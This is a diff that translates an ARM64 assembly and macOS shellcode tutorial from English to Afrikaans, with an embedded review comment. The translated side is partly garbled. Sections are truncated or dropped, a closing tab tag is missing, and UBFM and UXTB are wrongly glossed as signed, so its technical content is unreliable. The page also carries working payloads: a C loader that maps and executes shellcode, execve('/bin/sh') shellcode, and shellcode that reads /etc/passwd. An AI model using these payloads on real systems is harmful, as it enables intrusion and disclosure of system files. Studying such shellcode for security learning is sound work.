page address of `symbol` and stores it in `x0`. -* **`ldrsw`**: **Load** a signed **32-bit** value from memory and **sign-extend it to 64** bits. - * Example: `ldrsw x0, [x1]` — This loads a signed 32-bit value from the memory location pointed to by `x1`, sign-extends it to 64 bits, and stores it in `x0`. -* **`stur`**: **Store a register value to a memory location**, using an offset from another register. - * Example: `stur x0, [x1, #4]` — This stores the value in `x0` into the memory ddress that is 4 bytes greater than the address currently in `x1`. -* **`svc`** : Make a **system call**. It stands for "Supervisor Call". 
When the processor executes this instruction, it **switches from user mode to kernel mode** and jumps to a specific location in memory where the **kernel's system call handling** code is located. - * Example: +* **`mov`**: **Beweeg** 'n waarde van die een **register** na die ander. +* Voorbeeld: `mov x0, x1` — Dit beweeg die waarde van `x1` na `x0`. +* **`ldr`**: **Laai** 'n waarde van **geheue** in 'n **register**. +* Voorbeeld: `ldr x0, [x1]` — Dit laai 'n waarde van die geheueposisie wat deur `x1` aangedui word in `x0`. +* **`str`**: **Stoor** 'n waarde van 'n **register** in die **geheue**. +* Voorbeeld: `str x0, [x1]` — Dit stoor die waarde in `x0` in die geheueposisie wat deur `x1` aangedui word. +* **`ldp`**: **Laai Paar van Register**. Hierdie instruksie **laai twee registers** vanaf **opeenvolgende geheueposisies**. Die geheue-adres word tipies gevorm deur 'n verskuiwing by te voeg by die waarde in 'n ander register. +* Voorbeeld: `ldp x0, x1, [x2]` — Dit laai `x0` en `x1` vanaf die geheueposisies by `x2` en `x2 + 8`, onderskeidelik. +* **`stp`**: **Stoor Paar van Register**. Hierdie instruksie **stoor twee registers** na **opeenvolgende geheueposisies**. Die geheue-adres word tipies gevorm deur 'n verskuiwing by te voeg by die waarde in 'n ander register. +* Voorbeeld: `stp x0, x1, [x2]` — Dit stoor `x0` en `x1` na die geheueposisies by `x2` en `x2 + 8`, onderskeidelik. +* **`add`**: **Tel** die waardes van twee registers bymekaar en stoor die resultaat in 'n register. +* Syntaks: add(s) Xn1, Xn2, +* **`bfm`**: **Bit Filed Move**, hierdie operasies **kopieer bits `0...n`** van 'n waarde en plaas hulle in posisies **`m..m+n`**. Die **`#s`** spesifiseer die **linkerste bit** posisie en **`#r`** die **aantal regsomdraaie**. 
+* Bitveldbeweging: `BFM Xd, Xn, #r` +* Ondertekende Bitveldbeweging: `SBFM Xd, Xn, #r, #s` +* Ondertekende Bitveldbeweging: `UBFM Xd, Xn, #r, #s` +* **Bitveld Uittrek en Invoeg:** Kopieer 'n bitveld vanaf 'n register en kopieer dit na 'n ander register. +* **`BFI X1, X2, #3, #4`** Voeg 4 bits vanaf X2 in vanaf die 3de bit van X1 +* **`BFXIL X1, X2, #3, #4`** Trek vanaf die 3de bit van X2 vier bits uit en kopieer dit na X1 +* **`SBFIZ X1, X2, #3, #4`** Brei 4 bits vanaf X2 uit en voeg dit in X1 in beginnende by bit posisie 3 en maak die regterbits nul +* **`SBFX X1, X2, #3, #4`** Trek 4 bits uit beginnende by bit 3 vanaf X2, brei dit uit en plaas die resultaat in X1 +* **`UBFIZ X1, X2, #3, #4`** Brei 4 bits vanaf X2 uit en voeg dit in X1 in beginnende by bit posisie 3 en maak die regterbits nul +* **`UBFX X1, X2, #3, #4`** Trek 4 bits uit beginnende by bit 3 vanaf X2 en plaas die nul-uitgebreide resultaat in X1. +* **Brei Teken Uit Na X:** Brei die teken (of voeg net 0's by in die ondertekende weergawe) van 'n waarde uit om operasies daarmee uit te voer: +* **`SXTB X1, W2`** Brei die teken van 'n byte **vanaf W2 na X1** (`W2` is die helfte van `X2`) om die 64-bits te vul +* **`SXTH X1, W2`** Brei die teken van 'n 16-bits getal **vanaf W2 na X1** om die 64-bits te vul +* **`SXTW X1, W2`** Brei die teken van 'n byte **vanaf W2 na X1** om die 64-bits te vul +* **`UXTB X1, W2`** Voeg 0's by (ondertekend) by 'n byte **vanaf W2 na X1** om die 64-bits te vul +* **`extr`:** Trek bits uit van 'n gespesifiseerde **paar registers wat gekonkatenasieer is**. +* Voorbeeld: `EXTR W3, W2, W1, #3` Dit sal **W1+W2** konkatenasieer en vanaf bit 3 van W2 tot en met bit 3 van W1 kry en dit in W3 stoor. +* **`bl`**: **Branch** met skakel, gebruik om 'n **subroetine** te **roep**. Stoor die **terugkeeradres in `x30`**. +* Voorbeeld: `bl myFunction` — Dit roep die funksie `myFunction` en stoor die terugkeeradres in `x30`. 
+* **`blr`**: **Branch** met skakel na register, gebruik om 'n **subroetine** te **roep** waar die teiken in 'n **register** gespesifiseer word. Stoor die terugkeeradres in `x30`. +* Voorbeeld: `blr x1` — Dit roep die funksie waarvan die adres in `x1` bevat word en stoor die terugkeeradres in `x30`. +* **`ret`**: **Terugkeer** vanaf 'n **subroetine**, tipies deur die adres in **`x30`** te gebruik. +* Voorbeeld: `ret` — Dit keer terug vanaf die huidige subroetine deur die terugkeeradres in `x30` te gebruik. +* **`cmp`**: **Vergelyk** twee registers en stel toestandvlagte in. Dit is 'n **alias van `subs`** wat die bestemmingsregister na die nulregister stel. Nuttig om te weet of `m == n`. +* Dit ondersteun dieselfde sintaksis as `subs` +* Voorbeeld: `cmp x0, x1` — Dit vergelyk die waardes in `x0` en `x1` en stel die toestandvlagte dienooreenkomstig in. +* **`cmn`**: **Vergelyk negatiewe** operand. In hierdie geval is dit 'n **alias van `adds`** en ondersteun dieselfde sintaksis. Nuttig om te weet of `m == -n`. +* **tst**: Dit kontroleer of enige van die waardes van 'n register 1 is (werk soos 'n ANDS sonder om die resultaat enige plek te stoor) +* Voorbeeld: `tst X1, #7` Kontroleer of enige van die laaste 3 bits van X1 1 is +* **`b.eq`**: **Spring as gelyk**, gebaseer op die vorige `cmp` instruksie. +* Voorbeeld: `b.eq label` — As die vorige `cmp` instruksie twee gelyke waardes gevind het, spring dit na `label`. +* **`b.ne`**: **Spring as Nie Gelyk**. Hierdie instruksie kontroleer die toestandvlagte (wat deur 'n vorige vergelykingsinstruksie gestel is) en as die vergelykte waardes nie gelyk was nie, spring dit na 'n etiket of adres. +* Voorbeeld: Na 'n `cmp x0, x1` instruksie, `b.ne label` — As die waardes in `x0` en `x1` nie gelyk was nie, spring dit na `label`. +* **`cbz`**: **Vergelyk en Spring op Nul**. Hierdie instruksie vergelyk 'n register met nul en as hulle gelyk is, spring dit na 'n etiket of adres. 
+* Voorbeeld: `cbz x0, label` — As die waarde in `x0` nul is, spring dit na `label`. +* **`cbnz`**: **Vergelyk en Spring op Nie-Nul**. Hierdie instruksie vergelyk 'n register met nul en as hulle nie gelyk is nie, spring dit na 'n etiket of adres. +* Voorbeeld: `cbnz x0, label` — As die waarde in `x0` nie-nul is nie, spring dit na `label`. +* **`adrp`**: Bereken die **bladsy-adres van 'n simbool** en stoor dit in 'n register. +* Voorbeeld: `adrp x0, symbol` — Dit bereken die bladsy-adres van `symbol` en stoor dit in `x0`. +* **`ldrsw`**: **Laai** 'n ondertekende **32-bits** waarde vanaf geheue en **brei dit uit tot 64** bits. +* Voorbeeld: `ldrsw x0, [x1]` — Dit laai 'n ondertekende 32-bits waarde vanaf die geheueposisie wat deur `x1` aangedui word, brei dit uit tot 64 bits en stoor dit in `x0`. +* **`stur`**: **Stoor 'n registerwaarde na 'n geheueposisie**, met 'n verskuiwing vanaf 'n ander register. +* Voorbeeld: `stur x0, [x1, #4]` — Dit stoor die waarde in `x0` in die geheue-adres wat 4 byte groter is as die adres wat tans in `x1` is. +* **`svc`** : Maak 'n **stelseloproep**. Dit staan vir "Supervisor Call". Wanneer die verwerker hierdie instruksie uitvoer, skakel dit oor van gebruikersmodus na kernmodus en spring na 'n spesifieke plek in die geheue waar die **kern se stelseloproephantering** kode geleë is. +* Voorbeeld: - ```armasm - mov x8, 93 ; Load the system call number for exit (93) into register x8. - mov x0, 0 ; Load the exit status code (0) into register x0. - svc 0 ; Make the system call. - ``` +```armasm +mov x8, 93 ; Laai die stelseloproepnommer vir afsluiting (93) in register x8. +mov x0, 0 ; Laai die afsluitstatuskode (0) in register x0. +svc 0 ; Maak die stelseloproep. +``` +### **Funksie Proloog** -### **Function Prologue** +1. **Berg die skakelregister en raamverwysing op die stoorplek op**: -1. **Save the link register and frame pointer to the stack**: +{% code overflow="wrap" %} +```armasm +stp x29, x30, [sp, #-16]! 
; stoor die paar x29 en x30 op die stoorplek en verminder die stooraanwyser +``` +{% endcode %} +2. **Stel die nuwe raamverwysing op**: `mov x29, sp` (stel die nuwe raamverwysing op vir die huidige funksie) +3. **Ken ruimte op die stoorplek toe vir plaaslike veranderlikes** (indien nodig): `sub sp, sp, ` (waar `` die aantal bytes is wat benodig word) - {% code overflow="wrap" %} - ```armasm - stp x29, x30, [sp, #-16]! ; store pair x29 and x30 to the stack and decrement the stack pointer - ``` - {% endcode %} -2. **Set up the new frame pointer**: `mov x29, sp` (sets up the new frame pointer for the current function) -3. **Allocate space on the stack for local variables** (if needed): `sub sp, sp, ` (where `` is the number of bytes needed) +### **Funksie Epiloog** -### **Function Epilogue** - -1. **Deallocate local variables (if any were allocated)**: `add sp, sp, ` -2. **Restore the link register and frame pointer**: +1. **Deallokeer plaaslike veranderlikes (indien enige toegewys was)**: `add sp, sp, ` +2. **Herstel die skakelregister en raamverwysing**: {% code overflow="wrap" %} ```armasm 
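Review bot: Content is silently dropped in this hunk in two places and should be restored before merge. First, the SIMD paragraph is cut off mid-word and the entire `### System Registers` section (the `mrs`/`msr` sentence, the `TPIDR_EL0` paragraph and the `mrs x0, TPIDR_EL0` / `msr TPIDR_EL0, X0` examples) is removed with no Afrikaans replacement: the added line reads `+Daar is ook nog **32 registers van 128-bis lengte** wat gebruik kan word in geoptimalise ### **PSTATE**`, so the `### PSTATE` heading is fused onto a truncated sentence. Second, the `add` entry stops at `+* Syntaks: add(s) Xn1, Xn2,` and the rest of that entry plus the `sub`, `mul`, `div` and the `lsl`/`lsr`/`asr`/`ror`/`rrx` shift entries are deleted but never re-added. Separately, two meanings are inverted: `UBFM Xd, Xn, #r, #s` is labelled `Ondertekende` (signed) exactly like `SBFM`, and `UXTB` is glossed `(ondertekend)` where the source says unsigned; both should say `Onondertekende`/`onondertekend`. Minor wording: `aflynontleders` for debuggers should be `ontfouters`, `**`DAIF`**-vlakke` should be `-vlae` (flags, not levels), and `platformspefifieke` is misspelled.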
@@ -222,87 +188,83 @@ ldp x29, x30, [sp], #16 ; load pair x29 and x30 from the stack and increment th ``` {% endcode %} -3. **Return**: `ret` (returns control to the caller using the address in the link register) +3. **Terugkeer**: `ret` (gee beheer terug aan die oproeper deur die adres in die skakelregister te gebruik) -## AARCH32 Execution State +## AARCH32 Uitvoeringsstatus -Armv8-A support the execution of 32-bit programs. **AArch32** can run in one of **two instruction sets**: **`A32`** and **`T32`** and can switch between them via **`interworking`**.\ -**Privileged** 64-bit programs can schedule the **execution of 32-bit** programs by executing a exception level transfer to the lower privileged 32-bit.\ -Note that the transition from 64-bit to 32-bit occurs with a lower of the exception level (for example a 64-bit program in EL1 triggering a program in EL0). This is done by setting the **bit 4 of** **`SPSR_ELx`** special register **to 1** when the `AArch32` process thread is ready to be executed and the rest of `SPSR_ELx` stores the **`AArch32`** programs CPSR. Then, the privileged process calls the **`ERET`** instruction so the processor transitions to **`AArch32`** entering in A32 or T32 depending on CPSR**.** +Armv8-A ondersteun die uitvoering van 32-bis-programme. **AArch32** kan in een van **twee instruksiestelle** uitgevoer word: **`A32`** en **`T32`**, en kan tussen hulle skakel deur middel van **`interworking`**.\ +**Bevoorregte** 64-bis-programme kan die **uitvoering van 32-bis-programme skeduleer** deur 'n uitsonderingsvlak-oordrag na die laer bevoorregte 32-bis-program uit te voer.\ +Let daarop dat die oorgang van 64-bis na 32-bis plaasvind met 'n verlaging van die uitsonderingsvlak (byvoorbeeld 'n 64-bis-program in EL1 wat 'n program in EL0 teweegbring). 
Dit word gedoen deur die **bit 4 van** **`SPSR_ELx`** spesiale register **op 1** te stel wanneer die `AArch32` prosesdraad gereed is om uitgevoer te word, en die res van `SPSR_ELx` stoor die **`AArch32`** programme se CPSR. Dan roep die bevoorregte proses die **`ERET`** instruksie aan sodat die verwerker oorgaan na **`AArch32`** en in A32 of T32 binnegaan, afhangende van CPSR**.** -The **`interworking`** occurs using the J and T bits of CPSR. `J=0` and `T=0` means **`A32`** and `J=0` and `T=1` means **T32**. This basically traduces on setting the **lowest bit to 1** to indicate the instruction set is T32.\ -This is set during the **interworking branch instructions,** but can also be set directly with other instructions when the PC is set as the destination register. Example: - -Another example: +Die **`interworking`** vind plaas deur die J- en T-bits van CPSR te gebruik. `J=0` en `T=0` beteken **`A32`** en `J=0` en `T=1` beteken **T32**. Dit kom neer op die stelling van die **laagste bit as 1** om aan te dui dat die instruksiestel T32 is.\ +Dit word ingestel tydens die **interworking takinstruksies**, maar kan ook direk met ander instruksies ingestel word wanneer die PC as die bestemmingsregister ingestel word. Voorbeeld: +'n Ander voorbeeld: ```armasm _start: .code 32 ; Begin using A32 - add r4, pc, #1 ; Here PC is already pointing to "mov r0, #0" - bx r4 ; Swap to T32 mode: Jump to "mov r0, #0" + 1 (so T32) +add r4, pc, #1 ; Here PC is already pointing to "mov r0, #0" +bx r4 ; Swap to T32 mode: Jump to "mov r0, #0" + 1 (so T32) .code 16: - mov r0, #0 - mov r0, #8 +mov r0, #0 +mov r0, #8 ``` - ### Registers -There are 16 32-bit registers (r0-r15). **From r0 to r14** they can be used for **any operation**, however some of them are usually reserved: +Daar is 16 32-bit registers (r0-r15). Vanaf r0 tot r14 kan hulle gebruik word vir enige operasie, maar sommige van hulle is gewoonlik gereserveer: -* **`r15`**: Program counter (always). 
Contains the address of the next instruction. In A32 current + 8, in T32, current + 4. -* **`r11`**: Frame Pointer -* **`r12`**: Intra-procedural call register -* **`r13`**: Stack Pointer -* **`r14`**: Link Register +- `r15`: Programteller (altyd). Bevat die adres van die volgende instruksie. In A32 huidige + 8, in T32, huidige + 4. +- `r11`: Raampunt +- `r12`: Intra-prosedurale oproepregister +- `r13`: Stakpunt +- `r14`: Skakelregister -Moreover, registers are backed up in **`banked registries`**. Which are places that store the registers values allowing to perform **fast context switching** in exception handling and privileged operations to avoid the need to manually save and restore registers every time.\ -This is done by **saving the processor state from the `CPSR` to the `SPSR`** of the processor mode to which the exception is taken. On the exception returns, the **`CPSR`** is restored from the **`SPSR`**. +Verder word registerwaardes ondersteun in "gebankte registre". Dit is plekke wat die registerwaardes stoor om vinnige kontekswisseling in uitsonderingshantering en bevoorregte operasies moontlik te maak, om die nodigheid om registerwaardes handmatig te stoor en herstel te vermy. Dit word gedoen deur die prosessorstatus van die CPSR na die SPSR van die prosessormodus waarin die uitsondering geneem word, te stoor. By die terugkeer van die uitsondering word die CPSR herstel vanaf die SPSR. -### CPSR - Current Program Status Register +### CPSR - Huidige Programstatusregister -In AArch32 the CPSR works similar to **`PSTATE`** in AArch64 and is also stored in **`SPSR_ELx`** when a exception is taken to restore later the execution: +In AArch32 werk die CPSR soortgelyk aan PSTATE in AArch64 en word dit ook gestoor in SPSR_ELx wanneer 'n uitsondering geneem word om die uitvoering later te herstel:
-The fields are divided in some groups: +Die velde is verdeel in verskeie groepe: -* Application Program Status Register (APSR): Arithmetic flags and accesible from EL0 -* Execution State Registers: Process behaviour (managed by the OS). +- Application Program Status Register (APSR): Aritmetiese vlae en toeganklik vanaf EL0 +- Uitvoeringsstatusregisters: Prosessgedrag (bestuur deur die bedryfstelsel). #### Application Program Status Register (APSR) -* The **`N`**, **`Z`**, **`C`**, **`V`** flags (just like in AArch64) -* The **`Q`** flag: It's set to 1 whenever **integer saturation occurs** during the execution of a specialized saturating arithmetic instruction. Once it's set to **`1`**, it'll maintain the value until it's manually set to 0. Moreover, there isn't any instruction that checks its value implicitly, it must be done reading it manually. -* **`GE`** (Greater than or equal) Flags: It's used in SIMD (Single Instruction, Multiple Data) operations, such as "parallel add" and "parallel subtract". These operations allow processing multiple data points in a single instruction. +- Die `N`, `Z`, `C`, `V`-vlae (soos in AArch64) +- Die `Q`-vlaag: Dit word op 1 gestel wanneer daar tydens die uitvoering van 'n gespesialiseerde versadigende aritmetiese instruksie **integer versadiging plaasvind**. Sodra dit op `1` gestel is, sal dit die waarde behou totdat dit handmatig op 0 gestel word. Daar is ook geen instruksie wat sy waarde implisiet toets nie, dit moet handmatig gelees word. +- `GE` (Groter as of gelyk aan) Vlae: Dit word gebruik in SIMD (Enkele Instruksie, Meervoudige Data) operasies, soos "parallelle optelling" en "parallelle aftrekking". Hierdie operasies maak dit moontlik om meerdere datapunte in een instruksie te verwerk. - For example, the **`UADD8`** instruction **adds four pairs of bytes** (from two 32-bit operands) in parallel and stores the results in a 32-bit register. It then **sets the `GE` flags in the `APSR`** based on these results. 
Each GE flag corresponds to one of the byte additions, indicating if the addition for that byte pair **overflowed**. +Byvoorbeeld, die `UADD8`-instruksie tel vier pare byte (vanaf twee 32-bit operandi) parallel op en stoor die resultate in 'n 32-bit register. Dit stel dan die `GE`-vlae in die `APSR` in op grond van hierdie resultate. Elke GE-vlag stem ooreen met een van die byte-optellings en dui aan of die optelling vir daardie bytepaar **oorvloei** het. - The **`SEL`** instruction uses these GE flags to perform conditional actions. +Die `SEL`-instruksie gebruik hierdie GE-vlae om voorwaardelike aksies uit te voer. -#### Execution State Registers +#### Uitvoeringsstatusregisters -* The **`J`** and **`T`** bits: **`J`** should be 0 and if **`T`** is 0 the instruction set A32 is used, and if it's 1, the T32 is used. -* **IT Block State Register** (`ITSTATE`): These are the bits from 10-15 and 25-26. They store conditions for instructions inside an **`IT`** prefixed group. -* **`E`** bit: Indicates the **endianness**. -* **Mode and Exception Mask Bits** (0-4): They determine the current execution state. The **5th** one indicates if the program runs as 32bit (a 1) or 64bit (a 0). The other 4 represents the **exception mode currently in used** (when a exception occurs and it's being handled). The number set **indicates the current priority** in case another exception is triggered while this is being handled. +- Die `J`- en `T`-bits: `J` moet 0 wees en as `T` 0 is, word die A32-instruksiestel gebruik, en as dit 1 is, word die T32 gebruik. +- IT Blokstatusregister (`ITSTATE`): Dit is die bits vanaf 10-15 en 25-26. Hulle stoor voorwaardes vir instruksies binne 'n `IT`-voorafgegaan groep. +- `E`-bit: Dui die **endianness** aan. +- Modus- en Uitsonderingsmasker-bits (0-4): Hulle bepaal die huidige uitvoeringsstatus. Die vyfde een dui aan of die program as 32-bit (1) of 64-bit (0) uitgevoer word. 
Die ander 4 verteenwoordig die tans gebruikte uitsonderingsmodus (wanneer 'n uitsondering plaasvind en hanteer word). Die getalstel dui die huidige prioriteit aan in die geval 'n ander uitsondering geaktiveer word terwyl hierdie een hanteer word.
-* **`AIF`**: Certain exceptions can be disabled using the bits **`A`**, `I`, `F`. If **`A`** is 1 it means **asynchronous aborts** will be triggered. The **`I`** configures to respond to external hardware **Interrupts Requests** (IRQs). and the F is related to **Fast Interrupt Requests** (FIRs). +- `AIF`: Sekere uitsonderings kan gedeaktiveer word deur die bits `A`, `I`, `F` te gebruik. As `A` 1 is, beteken dit dat asynchrone afbreek geaktiveer sal word. Die `I` stel dit in om te reageer op eksterne hardeware-onderbrekingsversoeke (IRQ's). En die F is verband hou met vinnige onderbrekingsversoeke (FIR's). ## macOS -### BSD syscalls +### BSD-sysoproepe -Check out [**syscalls.master**](https://opensource.apple.com/source/xnu/xnu-1504.3.12/bsd/kern/syscalls.master). BSD syscalls will have **x16 > 0**. +Kyk na [**syscalls.master**](https://opensource.apple.com/source/xnu/xnu-1504.3.12/bsd/kern/syscalls.master). BSD-sysoproepe sal hê **x16 > 0**. ### Mach Traps -Check out [**syscall\_sw.c**](https://opensource.apple.com/source/xnu/xnu-3789.1.32/osfmk/kern/syscall\_sw.c.auto.html). Mach traps will have **x16 < 0**, so you need to call the numbers from the previous list with a **minus**: **`_kernelrpc_mach_vm_allocate_trap`** is **`-10`**. - -You can also check **`libsystem_kernel.dylib`** in a disassembler to find how to call these (and BSD) syscalls: +Kyk na [**syscall\_sw.c**](https://opensource.apple.com/source/xnu/xnu-3789.1.32/osfmk/kern/syscall\_sw.c.auto.html). Mach traps sal hê **x16 < 0**, so jy moet die nommers van die vorige lys met 'n min-teken noem: **`_kernelrpc_mach_vm_allocate_trap`** is **`-10`**. +Jy kan ook **`libsystem_kernel.dylib`** in 'n disassembler nagaan om uit te vind hoe om hierdie (en BSD) sysoproepe te noem: ```bash # macOS dyldex -e libsystem_kernel.dylib /System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/dyld_shared_cache_arm64e 
@@ -310,15 +272,13 @@ dyldex -e libsystem_kernel.dylib /System/Volumes/Preboot/Cryptexes/OS/System/Lib # iOS dyldex -e libsystem_kernel.dylib /System/Library/Caches/com.apple.dyld/dyld_shared_cache_arm64 ``` - {% hint style="success" %} -Sometimes it's easier to check the **decompiled** code from **`libsystem_kernel.dylib`** **than** checking the **source code** becasue the code of several syscalls (BSD and Mach) are generated via scripts (check comments in the source code) while in the dylib you can find what is being called. +Soms is dit makliker om die **gedekomponeerde** kode van **`libsystem_kernel.dylib`** te kontroleer as om die **bronkode** te kontroleer, omdat die kode van verskeie syscalls (BSD en Mach) gegenereer word deur skripte (kyk na kommentaar in die bronkode), terwyl jy in die dylib kan vind wat geroep word. {% endhint %} -### Shellcodes - -To compile: +### Shellkodes +Om te kompileer: ```bash as -o shell.o shell.s ld -o shell shell.o -macosx_version_min 13.0 -lSystem -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib @@ -326,20 +286,16 @@ ld -o shell shell.o -macosx_version_min 13.0 -lSystem -L /Library/Developer/Comm # You could also use this ld -o shell shell.o -syslibroot $(xcrun -sdk macosx --show-sdk-path) -lSystem ``` - -To extract the bytes: - +Om die bytes te onttrek: ```bash # Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/extract.sh for c in $(objdump -d "s.o" | grep -E '[0-9a-f]+:' | cut -f 1 | cut -d : -f 2) ; do - echo -n '\\x'$c +echo -n '\\x'$c done ``` -
-C code to test the shellcode - +C-kode om die shellcode te toets ```c // code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/loader.c // gcc loader.c -o loader @@ -353,161 +309,155 @@ int (*sc)(); char shellcode[] = ""; int main(int argc, char **argv) { - printf("[>] Shellcode Length: %zd Bytes\n", strlen(shellcode)); - - void *ptr = mmap(0, 0x1000, PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0); - - if (ptr == MAP_FAILED) { - perror("mmap"); - exit(-1); - } - printf("[+] SUCCESS: mmap\n"); - printf(" |-> Return = %p\n", ptr); - - void *dst = memcpy(ptr, shellcode, sizeof(shellcode)); - printf("[+] SUCCESS: memcpy\n"); - printf(" |-> Return = %p\n", dst); +printf("[>] Shellcode Length: %zd Bytes\n", strlen(shellcode)); - int status = mprotect(ptr, 0x1000, PROT_EXEC | PROT_READ); +void *ptr = mmap(0, 0x1000, PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0); - if (status == -1) { - perror("mprotect"); - exit(-1); - } - printf("[+] SUCCESS: mprotect\n"); - printf(" |-> Return = %d\n", status); +if (ptr == MAP_FAILED) { +perror("mmap"); +exit(-1); +} +printf("[+] SUCCESS: mmap\n"); +printf(" |-> Return = %p\n", ptr); - printf("[>] Trying to execute shellcode...\n"); +void *dst = memcpy(ptr, shellcode, sizeof(shellcode)); +printf("[+] SUCCESS: memcpy\n"); +printf(" |-> Return = %p\n", dst); - sc = ptr; - sc(); - - return 0; +int status = mprotect(ptr, 0x1000, PROT_EXEC | PROT_READ); + +if (status == -1) { +perror("mprotect"); +exit(-1); +} +printf("[+] SUCCESS: mprotect\n"); +printf(" |-> Return = %d\n", status); + +printf("[>] Trying to execute shellcode...\n"); + +sc = ptr; +sc(); + +return 0; } ``` -
-#### Shell +#### Skulp -Taken from [**here**](https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/shell.s) and explained. +Geneem van [**hier**](https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/shell.s) en verduidelik. {% tabs %} -{% tab title="with adr" %} -```armasm -.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment. -.global _main ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program. -.align 2 ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4). - -_main: - adr x0, sh_path ; This is the address of "/bin/sh". - mov x1, xzr ; Clear x1, because we need to pass NULL as the second argument to execve. - mov x2, xzr ; Clear x2, because we need to pass NULL as the third argument to execve. - mov x16, #59 ; Move the execve syscall number (59) into x16. - svc #0x1337 ; Make the syscall. The number 0x1337 doesn't actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16. - -sh_path: .asciz "/bin/sh" -``` -{% endtab %} - -{% tab title="with stack" %} +{% tab title="met adr" %} ```armasm .section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment. .global _main ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program. .align 2 ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4). _main: - ; We are going to build the string "/bin/sh" and place it on the stack. - - mov x1, #0x622F ; Move the lower half of "/bi" into x1. 0x62 = 'b', 0x2F = '/'. - movk x1, #0x6E69, lsl #16 ; Move the next half of "/bin" into x1, shifted left by 16. 0x6E = 'n', 0x69 = 'i'. 
- movk x1, #0x732F, lsl #32 ; Move the first half of "/sh" into x1, shifted left by 32. 0x73 = 's', 0x2F = '/'. - movk x1, #0x68, lsl #48 ; Move the last part of "/sh" into x1, shifted left by 48. 0x68 = 'h'. +adr x0, sh_path ; This is the address of "/bin/sh". +mov x1, xzr ; Clear x1, because we need to pass NULL as the second argument to execve. +mov x2, xzr ; Clear x2, because we need to pass NULL as the third argument to execve. +mov x16, #59 ; Move the execve syscall number (59) into x16. +svc #0x1337 ; Make the syscall. The number 0x1337 doesn't actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16. - str x1, [sp, #-8] ; Store the value of x1 (the "/bin/sh" string) at the location `sp - 8`. +sh_path: .asciz "/bin/sh" +``` +{% tab title="met stapel" %} +```armasm +.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment. +.global _main ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program. +.align 2 ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4). - ; Prepare arguments for the execve syscall. - - mov x1, #8 ; Set x1 to 8. - sub x0, sp, x1 ; Subtract x1 (8) from the stack pointer (sp) and store the result in x0. This is the address of "/bin/sh" string on the stack. - mov x1, xzr ; Clear x1, because we need to pass NULL as the second argument to execve. - mov x2, xzr ; Clear x2, because we need to pass NULL as the third argument to execve. +_main: +; We are going to build the string "/bin/sh" and place it on the stack. - ; Make the syscall. - - mov x16, #59 ; Move the execve syscall number (59) into x16. - svc #0x1337 ; Make the syscall. 
The number 0x1337 doesn't actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16. +mov x1, #0x622F ; Move the lower half of "/bi" into x1. 0x62 = 'b', 0x2F = '/'. +movk x1, #0x6E69, lsl #16 ; Move the next half of "/bin" into x1, shifted left by 16. 0x6E = 'n', 0x69 = 'i'. +movk x1, #0x732F, lsl #32 ; Move the first half of "/sh" into x1, shifted left by 32. 0x73 = 's', 0x2F = '/'. +movk x1, #0x68, lsl #48 ; Move the last part of "/sh" into x1, shifted left by 48. 0x68 = 'h'. + +str x1, [sp, #-8] ; Store the value of x1 (the "/bin/sh" string) at the location `sp - 8`. + +; Prepare arguments for the execve syscall. + +mov x1, #8 ; Set x1 to 8. +sub x0, sp, x1 ; Subtract x1 (8) from the stack pointer (sp) and store the result in x0. This is the address of "/bin/sh" string on the stack. +mov x1, xzr ; Clear x1, because we need to pass NULL as the second argument to execve. +mov x2, xzr ; Clear x2, because we need to pass NULL as the third argument to execve. + +; Make the syscall. + +mov x16, #59 ; Move the execve syscall number (59) into x16. +svc #0x1337 ; Make the syscall. The number 0x1337 doesn't actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16. ``` {% endtab %} {% endtabs %} -#### Read with cat - -The goal is to execute `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)`, so the second argument (x1) is an array of params (which in memory these means a stack of the addresses). +#### Lees met kat +Die doel is om `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)` uit te voer, so die tweede argument (x1) is 'n reeks van parameters (wat in die geheue 'n stapel van die adresse beteken). 
```armasm .section __TEXT,__text ; Begin a new section of type __TEXT and name __text .global _main ; Declare a global symbol _main .align 2 ; Align the beginning of the following code to a 4-byte boundary _main: - ; Prepare the arguments for the execve syscall - sub sp, sp, #48 ; Allocate space on the stack - mov x1, sp ; x1 will hold the address of the argument array - adr x0, cat_path - str x0, [x1] ; Store the address of "/bin/cat" as the first argument - adr x0, passwd_path ; Get the address of "/etc/passwd" - str x0, [x1, #8] ; Store the address of "/etc/passwd" as the second argument - str xzr, [x1, #16] ; Store NULL as the third argument (end of arguments) - - adr x0, cat_path - mov x2, xzr ; Clear x2 to hold NULL (no environment variables) - mov x16, #59 ; Load the syscall number for execve (59) into x8 - svc 0 ; Make the syscall +; Prepare the arguments for the execve syscall +sub sp, sp, #48 ; Allocate space on the stack +mov x1, sp ; x1 will hold the address of the argument array +adr x0, cat_path +str x0, [x1] ; Store the address of "/bin/cat" as the first argument +adr x0, passwd_path ; Get the address of "/etc/passwd" +str x0, [x1, #8] ; Store the address of "/etc/passwd" as the second argument +str xzr, [x1, #16] ; Store NULL as the third argument (end of arguments) + +adr x0, cat_path +mov x2, xzr ; Clear x2 to hold NULL (no environment variables) +mov x16, #59 ; Load the syscall number for execve (59) into x8 +svc 0 ; Make the syscall cat_path: .asciz 